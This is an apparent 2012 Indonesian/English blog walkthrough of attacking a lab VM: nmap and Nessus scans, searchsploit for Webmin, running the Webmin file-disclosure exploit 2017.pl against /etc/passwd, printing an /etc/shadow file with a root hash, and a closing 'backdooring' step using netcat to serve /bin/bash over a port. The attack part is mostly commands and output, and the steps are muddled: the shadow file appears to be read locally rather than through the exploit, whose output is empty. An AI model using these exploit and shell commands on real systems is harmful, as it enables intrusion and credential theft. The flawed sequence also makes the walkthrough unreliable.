Daftar Blog Saya

Senin, 30 Januari 2012

Privillege Escalation


A. Information Gathering and Service Enumeration
1.scan dengan nmap
root@BT:~# nmap -v -A 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:31 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:31
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:31, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:32, 13.00s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 192.168.0.112 [1000 ports]
Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 19:32, 0.15s elapsed (1000 total ports)
Initiating Service scan at 19:32
Scanning 5 services on 192.168.0.112
Completed Service scan at 19:32, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 19:32
Completed NSE at 19:32, 10.40s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00070s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.078 days (since Mon Jan 30 17:39:51 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
|   NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UBUNTUVM<00>         Flags: <unique><active>
|     UBUNTUVM<03>         Flags: <unique><active>
|     UBUNTUVM<20>         Flags: <unique><active>
|     MSHOME<1e>           Flags: <group><active>
|_    MSHOME<00>           Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name:
|_  System time: 2012-01-31 02:32:26 UTC-6

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.0.112

NSE: Script Post-scanning.
Initiating NSE at 19:32
Completed NSE at 19:32, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.54 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)


2.      scan with nessus
NESSUS REPORT
List of PlugIn IDs


The following plugin IDs have problems associated with them. Select the ID to review more detail.
PLUGIN ID#
#
PLUGIN NAME
SEVERITY
32314
1
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness
High Severity problem(s) found
PORT SSH  (22/TCP)
Plugin ID: 32314
Debian OpenSSH/OpenSSL Package Random Number Generator Weakness

Synopsis
The remote SSH host keys are weak.
List of Hosts
192.168.0.112


Description

The remote SSH host key has been generated on a Debian
or Ubuntu system which contains a bug in the random number
generator of its OpenSSL library.

The problem is due to a Debian packager removing nearly all
sources of entropy in the remote version of OpenSSL.

An attacker can easily obtain the private part of the remote
key and use this to set up decipher the remote session  or
set up a man in the middle attack.

Solution
Consider all cryptographic material generated on the remote host
to be guessable. In particuliar, all SSH, SSL and OpenVPN key
material should be re-generated.

See also

Risk Factor
Critical/ CVSS Base Score: 10.0
(CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C)
CVSS Temporal Score: 8.3(CVSS2#E:F/RL:OF/RC:C)


Bugtraq ID
29179

Other References OSVDB:45029

Plugin publication date: 2008/05/14
Plugin last modification date: 2011/03/21
Ease of exploitability : Exploits are available
Exploitable with: Core Impact





192.168.0.112
Scan Time
Start time:
Mon Jan 30 19:31:52 2012
End time:
Mon Jan 30 19:36:04 2012
Number of vulnerabilities
High
1
Medium
5
Low
38

Remote Host Information
Operating System:
Linux Kernel 2.6
NetBIOS name:
UBUNTUVM
IP address:
192.168.0.112
MAC addresses:
08:00:27:aa:ec:6d

root@BT:~# nmap -v -sN 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:29 WIT
Initiating ARP Ping Scan at 19:29
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:29, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:29
Completed Parallel DNS resolution of 1 host. at 19:29, 13.00s elapsed
Initiating NULL Scan at 19:29
Scanning 192.168.0.112 [1000 ports]
Completed NULL Scan at 19:30, 2.37s elapsed (1000 total ports)
Nmap scan report for 192.168.0.112
Host is up (0.0022s latency).
Not shown: 995 closed ports
PORT      STATE         SERVICE
22/tcp    open|filtered ssh
80/tcp    open|filtered http
139/tcp   open|filtered netbios-ssn
445/tcp   open|filtered microsoft-ds
10000/tcp open|filtered snet-sensor-mgmt
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 17.69 seconds
           Raw packets sent: 1017 (40.668KB) | Rcvd: 996 (39.828KB)
root@BT:~# nmap -v -A 192.168.0.112

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-01-30 19:31 WIT
NSE: Loaded 87 scripts for scanning.
NSE: Script Pre-scanning.
Initiating ARP Ping Scan at 19:31
Scanning 192.168.0.112 [1 port]
Completed ARP Ping Scan at 19:31, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:31
Completed Parallel DNS resolution of 1 host. at 19:32, 13.00s elapsed
Initiating SYN Stealth Scan at 19:32
Scanning 192.168.0.112 [1000 ports]
Discovered open port 445/tcp on 192.168.0.112
Discovered open port 80/tcp on 192.168.0.112
Discovered open port 22/tcp on 192.168.0.112
Discovered open port 139/tcp on 192.168.0.112
Discovered open port 10000/tcp on 192.168.0.112
Completed SYN Stealth Scan at 19:32, 0.15s elapsed (1000 total ports)
Initiating Service scan at 19:32
Scanning 5 services on 192.168.0.112
Completed Service scan at 19:32, 11.02s elapsed (5 services on 1 host)
Initiating OS detection (try #1) against 192.168.0.112
NSE: Script scanning 192.168.0.112.
Initiating NSE at 19:32
Completed NSE at 19:32, 10.40s elapsed
Nmap scan report for 192.168.0.112
Host is up (0.00070s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 4.6p1 Debian 5build1 (protocol 2.0)
| ssh-hostkey: 1024 e4:46:40:bf:e6:29:ac:c6:00:e2:b2:a3:e1:50:90:3c (DSA)
|_2048 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d (RSA)
80/tcp    open  http        Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
|_http-title: Site doesn't have a title (text/html).
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
139/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
445/tcp   open  netbios-ssn Samba smbd 3.X (workgroup: MSHOME)
10000/tcp open  http        MiniServ 0.01 (Webmin httpd)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-favicon: Unknown favicon MD5: 1F4BAEFFD3C738F5BEDC24B7B6B43285
MAC Address: 08:00:27:AA:EC:6D (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:kernel:2.6.22
OS details: Linux 2.6.22 (embedded, ARM)
Uptime guess: 0.078 days (since Mon Jan 30 17:39:51 2012)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=199 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Host script results:
| nbstat:
|   NetBIOS name: UBUNTUVM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|   Names
|     UBUNTUVM<00>         Flags: <unique><active>
|     UBUNTUVM<03>         Flags: <unique><active>
|     UBUNTUVM<20>         Flags: <unique><active>
|     MSHOME<1e>           Flags: <group><active>
|_    MSHOME<00>           Flags: <group><active>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-security-mode:
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.26a)
|   Computer name: ubuntuvm
|   Domain name: nsdlab
|   FQDN: ubuntuvm.NSDLAB
|   NetBIOS computer name:
|_  System time: 2012-01-31 02:32:26 UTC-6

TRACEROUTE
HOP RTT     ADDRESS
1   0.70 ms 192.168.0.112

NSE: Script Post-scanning.
Initiating NSE at 19:32
Completed NSE at 19:32, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 37.54 seconds
           Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.358KB)

1.in the step to write :
root@BT:~# cd /pentest/exploits/exploitdb/

2.type ls to know directory
root@BT:/pentest/exploits/exploitdb# ls
files.csv  platforms  searchsploit

3. the next write ./searchsploit webmin  to know file webnim
root@BT:/pentest/exploits/exploitdb# ./searchsploit webmin
 Description                                                                 Path
--------------------------------------------------------------------------- -------------------------
Webmin BruteForce and Command Execution Exploit                             /multiple/remote/705.pl
Webmin Web Brute Force v1.5 (cgi-version)                                   /multiple/remote/745.cgi
Webmin BruteForce + Command Execution v1.5                                  /multiple/remote/746.pl
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit          /multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit (perl)   /multiple/remote/2017.pl
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin 1.0 (window.php) Remote File Include Vulnerability              /php/webapps/2451.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt
phpMyWebmin <= 1.0 (target) Remote File Include Vulnerabilities             /php/webapps/2462.txt

4. copying file 2017 perl with type cp platforms/multiple/remote/2017.pl ~
root@BT:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl ~

5. quit to pentest with type cd
root@BT:/pentest/exploits/exploitdb# cd

6. see the value folder home
root@BT:~# ls
2017.pl                          NessusReport21.rtf  NessusReport45.rtf  subnet
Desktop                          NessusReport26.rtf  NessusReport63.rtf  VirtualBox VMs
download                         NessusReport27.rtf  NessusReport65.rtf  workspace
galau.ps                         NessusReport32.rtf  NessusReport66.rtf  xpreport.rtf
galau.txt                        NessusReport35.rtf  NessusReport67.rtf
IS2C                             NessusReport40.rtf  NessusReport70.rtf
Nessus-4.4.1-ubuntu910_i386.deb  NessusReport44.rtf  NessusReport.rtf

7. see file 2017.pl
root@BT:~# perl 2017.pl
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd
root@BT:~# perl 2017.pl 192.168.0.112 10000
Usage: 2017.pl <url> <port> <filename> <target>
TARGETS are
 0  - > HTTP
 1  - > HTTPS
Define full path with file name
Example: ./webmin.pl blah.com 10000 /etc/passwd

8.Open the encryption of password and user name, with type:perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
root@BT:~# perl 2017.pl http://192.168.0.112 10000 /etc/passwd 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking http://192.168.0.112 on port 10000!
FILENAME:  /etc/passwd

 FILE CONTENT STARTED
 -----------------------------------

 -------------------------------------

9. Show all the username and password in shadow folder, type : cat /etc/shadow
root@BT:~# cat /etc/shadow
root:$6$0qQlDJcx$T3ZDddWlo4qXZoPI7gxOIuJHgw3/8gGF6ti3RUGAc0pLD2HOJFGAaExAjRTDwrWWmY5U2/U0M8rIt1yz554PY/:15362:0:99999:7:::
daemon:x:15362:0:99999:7:::
bin:x:15362:0:99999:7:::
sys:x:15362:0:99999:7:::
sync:x:15362:0:99999:7:::
games:x:15362:0:99999:7:::
man:x:15362:0:99999:7:::
lp:x:15362:0:99999:7:::
mail:x:15362:0:99999:7:::
news:x:15362:0:99999:7:::
uucp:x:15362:0:99999:7:::
proxy:x:15362:0:99999:7:::
www-data:x:15362:0:99999:7:::
backup:x:15362:0:99999:7:::
list:x:15362:0:99999:7:::
irc:x:15362:0:99999:7:::
gnats:x:15362:0:99999:7:::
libuuid:x:15362:0:99999:7:::
syslog:x:15362:0:99999:7:::
sshd:x:15362:0:99999:7:::
landscape:x:15362:0:99999:7:::
messagebus:x:15362:0:99999:7:::
nobody:x:15362:0:99999:7:::
mysql:!:15362:0:99999:7:::
avahi:*:15362:0:99999:7:::
snort:*:15362:0:99999:7:::
statd:*:15362:0:99999:7:::
haldaemon:*:15362:0:99999:7:::
kdm:*:15362:0:99999:7:::
festival:*:15362:0:99999:7:::
usbmux:*:15362:0:99999:7:::
postgres:!:15362:0:99999:7:::
privoxy:*:15362:0:99999:7:::
debian-tor:*:15362:0:99999:7:::
clamav:!:15362:0:99999:7:::

backdooring
1.      nc -l -p 1234
2.      nc localhost 1234 -e /bin/bash



Tidak ada komentar:

Posting Komentar